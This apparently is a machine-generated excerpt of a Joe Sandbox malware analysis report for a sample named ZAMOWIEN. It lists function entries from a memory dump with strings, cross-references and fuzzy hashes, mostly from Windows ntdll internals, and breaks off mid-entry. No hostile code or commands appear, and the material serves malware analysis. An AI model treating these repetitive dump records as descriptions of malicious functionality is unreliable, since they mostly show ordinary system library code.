Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 4ffac0f5226d09ef044f140de0ae2a95a5cf14446294782e4ef8d8c5fd244557
Instruction ID: b73dd5f4f32305674dc192854bd88e26f20c73a054195448b0d76ed5c6c816e5
Opcode Fuzzy Hash: 4ffac0f5226d09ef044f140de0ae2a95a5cf14446294782e4ef8d8c5fd244557
Instruction Fuzzy Hash: 00E1DE78A08396AFE719CF68C450B7ABBE2BF48704F14845DE8969F346DB35E840CB50

Function 327FBAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON

Download Yara Rule

Strings

{, xrefs: 32853ABD
LdrpLoadResourceFromAlternativeModule, xrefs: 32853AAF
'LDR: %s(), invalid image format of MUI file , xrefs: 32853AB4

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
API String ID: 0-1697150599
Opcode ID: c9dd088bb6510b235a67ac8add2a9f10909d74ac1e1fb0046edc58ae2cb65b2c
Instruction ID: 2dbe6683c9359342114b931103ebfc4f74936a3ac25f92e11624645dfb5b0074
Opcode Fuzzy Hash: c9dd088bb6510b235a67ac8add2a9f10909d74ac1e1fb0046edc58ae2cb65b2c
Instruction Fuzzy Hash: 06E1AB7960C385ABE305CF14C484B6BB7E2BF88788F50992DF9859B350DB72D945CB82

Function 3287368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 32873842
@, xrefs: 3287389F
DelegatedNtdll, xrefs: 328736CE

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: d54aaa3cdf58a4c743869edf6160f82e5c520a237b3aa97d7c1230f8695fd8e8
Instruction ID: cae27f595f89dc63d42adf2097c132d47dfd148a186a86b123d0f0804b7f9fd3
Opcode Fuzzy Hash: d54aaa3cdf58a4c743869edf6160f82e5c520a237b3aa97d7c1230f8695fd8e8
Instruction Fuzzy Hash: 20B1D0B9605745AFE311CF58C880F5BB7E8FF44754F400829FA64AB280DBB4E854CB92

Function 328836EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Enter, xrefs: 32883715
@, xrefs: 32883867
LdrpResMapFile Exit, xrefs: 32883727

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 6b58d37ec873123e8303c85022981ecf81338498bc9aa641b3471884f94f26c9
Instruction ID: 9bedcfd3753f56f2929d486d170a8d2e66287dd8c837231678035265d7c8c171
Opcode Fuzzy Hash: 6b58d37ec873123e8303c85022981ecf81338498bc9aa641b3471884f94f26c9
Instruction Fuzzy Hash: 65819BB9608341AFE311DB19C880F6AB7E8FF85754F404929FD989B390DB74D904CBA2

Function 32877410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 328775FC
Objects=%4u, xrefs: 328775EA
Objects>%4u, xrefs: 328775D5

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: e0a412ef2248aa64819fc255632405d3850ad23204366add615dfe17f619d259
Instruction ID: 3b9e750288b597d987ef7a2db0838186f8511d808c7d78dfb1247894a267f932
Opcode Fuzzy Hash: e0a412ef2248aa64819fc255632405d3850ad23204366add615dfe17f619d259
Instruction Fuzzy Hash: D4913CB8E002159FEB14CF6DC480B9DBBB1BF48314F14C16AD919AB395EB759842CF94

Function 3282909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 32865CF8
%, xrefs: 32865D3F
@, xrefs: 32829148

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 6afca61e04ad98596fb934cfdb4460b443d3a754b155c3c41754be86e2efcdfc
Instruction ID: 2aa9f62945a7d51fa9cf04142e593e68d1bf6b694ba85aacc245d20353d1b789
Opcode Fuzzy Hash: 6afca61e04ad98596fb934cfdb4460b443d3a754b155c3c41754be86e2efcdfc
Instruction Fuzzy Hash: 7971E27C609305DFE304CF25C980A1BBBE6FF84758F20891DE9A957290CB75D986CB92

Function 328CB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 328CB82A
GlobalizationUserSettings, xrefs: 328CB834
TargetNtPath, xrefs: 328CB82F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 68437f5118bbee642041b41f9cc739fe85baa50ad631bbcd9cebd4fe414d56c0
Instruction ID: c4430d8327d5f380f055a2c5caa7099b8ef6ceaf2226bb844decca99040f2631
Opcode Fuzzy Hash: 68437f5118bbee642041b41f9cc739fe85baa50ad631bbcd9cebd4fe414d56c0
Instruction Fuzzy Hash: 6A61BF76981638ABDB21CF58CC88BDAB7B8BF14755F0101E5A908AB250DB74DE84CF90

Function 327EF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3284E6B3
HEAP[%wZ]: , xrefs: 3284E6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3284E6C6

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: df3ae170bde1a4653f38a20223db80832e44a8ed3a3f2f8cfd1d0647a3e51cd9
Instruction ID: a0bb5f7db8383f1e6862d7f7eb1d496c43e3bf78daef27d1c9bd33fa8b0cd0df
Opcode Fuzzy Hash: df3ae170bde1a4653f38a20223db80832e44a8ed3a3f2f8cfd1d0647a3e51cd9
Instruction Fuzzy Hash: 0F513979600744EFE312CB68C845F9ABBF8FF05344F1040A5E955DB692DB74E941CB61

Function 328115F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 3285A589
minkernel\ntdll\ldrmap.c, xrefs: 3285A59A
LdrpCompleteMapModule, xrefs: 3285A590

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: f4bcffb557afb20b1044ad79cb9732cab9215158922109ba160aa787df9d2817
Instruction ID: 39cb9a51b6083547b9002392c5cc03ae5adb347ad0900399e90352d86b3b2c05
Opcode Fuzzy Hash: f4bcffb557afb20b1044ad79cb9732cab9215158922109ba160aa787df9d2817
Instruction Fuzzy Hash: D351F1BC6007459FE711CB68C980B5A7BE4BF00B58F2806A5F9559B6E2DB75F840CB40

Function 3289DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3289DC1F
HEAP[%wZ]: , xrefs: 3289DC12
Heap block at %p modified at %p past requested size of %Ix, xrefs: 3289DC32

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 054b27af1e5c72a483538963a6ff18b5a414bc9bb2cfae7d23a9843e838da808
Instruction ID: 1c7049a34557cd466a82e25e8a2a4fd350b4d20074b077ffd267595e123320c3
Opcode Fuzzy Hash: 054b27af1e5c72a483538963a6ff18b5a414bc9bb2cfae7d23a9843e838da808
Instruction Fuzzy Hash: D851247D104354CEF358EE29C8447F277E1EB5538CF804889E8C98B685DA76D847DB68

Function 327F1B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3284FB63
HEAP: , xrefs: 3284FB58
HEAP[%wZ]: , xrefs: 3284FB4B

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: baa3ee1358384a509a8fd933eda57b6ada0eb5b67c1685c805385bdc8c81a581
Instruction ID: 61f642d3327bf41fada5f2c73db4cb26748abc21ba233c34fbeebb502331fb2e
Opcode Fuzzy Hash: baa3ee1358384a509a8fd933eda57b6ada0eb5b67c1685c805385bdc8c81a581
Instruction Fuzzy Hash: 46518B34A08215EFEB08CF68C484B6ABBB1FF45714F158198D854AF342EB72E942CB90

Function 327E758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 3284AFCB
HEAP: , xrefs: 3284AFB8
HEAP[%wZ]: , xrefs: 3284AFAB

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 5af4a81763dfce8ac854d551e996d31958d5f8aa576c7639f4e9234c18e05442
Instruction ID: 441f9b0ed38f8d9a46307a59412164001b2ccbab18f9e549df88592c953e8570
Opcode Fuzzy Hash: 5af4a81763dfce8ac854d551e996d31958d5f8aa576c7639f4e9234c18e05442
Instruction Fuzzy Hash: C641E4F92003448FEB15CB58C4A1BE977E1BB0138CF5445ADD84A8FA86DF74D486CB61

Function 328216CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 32861B40
minkernel\ntdll\ldrtls.c, xrefs: 32861B4A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32861B39

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: cf225b18defd0c2900a3da8644984bd131c3e25ae05434160ee76ce0a868bbda
Instruction ID: b241db5c8f411258317fc1504b2b6e22b72555fa466db0c63399db384f990419
Opcode Fuzzy Hash: cf225b18defd0c2900a3da8644984bd131c3e25ae05434160ee76ce0a868bbda
Instruction Fuzzy Hash: 32416DB9A01609EFDB15CFA8C841BADBBF5FF48708F108519E415A7351DB75A841CFA0

Function 328A5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

Leaked Block 0x%p size 0x%p (stack %p depth %u), xrefs: 328A52AB
HEAP: , xrefs: 328A5291
HEAP[%wZ]: , xrefs: 328A5284

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
API String ID: 0-964947082
Opcode ID: 5168d65c61fed3df99ae65d2b6c864ab19f6414a920c7081f9c2bc2cca6174a8
Instruction ID: fa39a5b766959e3fbf6ad47afc5583df3306a8d134e99ce18fd3b07b0a2fd7d4
Opcode Fuzzy Hash: 5168d65c61fed3df99ae65d2b6c864ab19f6414a920c7081f9c2bc2cca6174a8
Instruction Fuzzy Hash: 524103B9A13258EFD710CF55C8A0F6A3BB5FB04354F400429E9199B280DF75D9C4CB60

Function 328233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 328629FE
Actx , xrefs: 328233AC
RtlCreateActivationContext, xrefs: 328629F9

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 34892d9fc1bf8ec7c1c4bdf71ba0e3d099de684170be7cf1a647ad3be2d9626c
Instruction ID: 1547e5919e875c2647e7a4d3e6843034e29e453b7800ac0ab5f05b4c67c7eaef
Opcode Fuzzy Hash: 34892d9fc1bf8ec7c1c4bdf71ba0e3d099de684170be7cf1a647ad3be2d9626c
Instruction Fuzzy Hash: 5531773A2003059FEB16CF18C890F9637A4FF54759F0584A9ED08EF285CBB5D891CB90

Function 3287B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 3287B68F
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3287B632
@, xrefs: 3287B670

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 437892f20bfa36fb4a3c4f353f681c4c32335a41ac28107858cfcf6f62f8a6a6
Instruction ID: ebc3b33948d72acb7c7f09f2dab82b57c80aa02a097587a873a91a1d1aa89934
Opcode Fuzzy Hash: 437892f20bfa36fb4a3c4f353f681c4c32335a41ac28107858cfcf6f62f8a6a6
Instruction Fuzzy Hash: 70315CB9D00209AFDB01DFA9CC80AEEBBB9FF44744F400469E605A7241DB749E04CBA4

Function 328913B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control, xrefs: 328913C4
OsBootstatPath, xrefs: 32891410
@, xrefs: 328913F3

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
API String ID: 0-1050206962
Opcode ID: ec9dc9a42aa3d4bf647cceecc06dcdaa02831cb49f87cd8a39894ec198046dd4
Instruction ID: 3cbdee916ccb1eec14b4c9a2f2b05057affdf28211e415c8a6be6146761d77a1
Opcode Fuzzy Hash: ec9dc9a42aa3d4bf647cceecc06dcdaa02831cb49f87cd8a39894ec198046dd4
Instruction Fuzzy Hash: 37316DBA901219AFEB028F94CC84EDEBBBDEB48B54F414465EA14A7210D7789D048BA0

Function 32821607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 32861A40
LdrpInitializeTls, xrefs: 32861A47
minkernel\ntdll\ldrtls.c, xrefs: 32861A51

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 74a6ef5e3dc450cddd7171e05a937493f23998d9bd6643e1a2533b71d55320a5
Instruction ID: 81bab840758d7a45f6d31f4a7e3cdbc9bcbaa19e12546beea700abbe85c3d047
Opcode Fuzzy Hash: 74a6ef5e3dc450cddd7171e05a937493f23998d9bd6643e1a2533b71d55320a5
Instruction Fuzzy Hash: 8D31F579A51304FFF7108B48CC85F6E77B8BB40B48F140529E905BB182DBB4ED818BA0

Function 32831270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 3283130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3283127B
@, xrefs: 328312A5

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 09a18d4b7f7c1906cfb26cc9ddb426407258eb31a39854333ee9d40f2c79c84a
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 7731927D901618EFDF129B99CD40EEEBBB9EB44B54F004025EA14A7160DB74D905CB90

Function 327E74B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3284AEC0

Strings

RtlValidateHeap, xrefs: 327E74ED, 327E752F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: RtlValidateHeap
API String ID: 3446177414-1797218451
Opcode ID: 445b999f72ca7989a78b09e2c2edf14e014bdb23ff6357fb4c785ea5677ca0d3
Instruction ID: 7348ecb6aa456015eec0c5109f8eb3f7b0af2e4ca5453049b2e8e29f025701e7
Opcode Fuzzy Hash: 445b999f72ca7989a78b09e2c2edf14e014bdb23ff6357fb4c785ea5677ca0d3
Instruction Fuzzy Hash: 6C41D57AA013599FDB06CFA8C4A07EDB7B2BF41754F048659D8666F280CF349905DBA0

Function 3289705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328970C2

Strings

kLsE, xrefs: 328970A4

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 1935306067d08b009772b156a5374c0650bd45eefb3cdd12df776bc9913f5a72
Instruction ID: 3c2d1d9fd92bd67b3b4b7a2d1e9ab7f45f78468a061315e5ce69366c31df41b3
Opcode Fuzzy Hash: 1935306067d08b009772b156a5374c0650bd45eefb3cdd12df776bc9913f5a72
Instruction Fuzzy Hash: 664147F95A2361C7E7129F64C884BA93BA0FB40778F540919EC64AA1D1CBB558C3CBA1

Function 328052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 328055A3
@, xrefs: 32805445

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d1defa39f7de2c5fadb6757f01db21aeb657952b9417b77a0028494a79225025
Instruction ID: e74b6e2b4fbdc1a13667d10a90a179fb587df727a2afdf33469f13df9ee5926c
Opcode Fuzzy Hash: d1defa39f7de2c5fadb6757f01db21aeb657952b9417b77a0028494a79225025
Instruction Fuzzy Hash: 4D329CBC509311AFE7248F14C89076BB7E1FF89748F50891EE99997290EB78D844CF62

Function 327F5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327F5778
RtlDebugPrintTimes.NTDLL ref: 32850816

Memory Dump Source

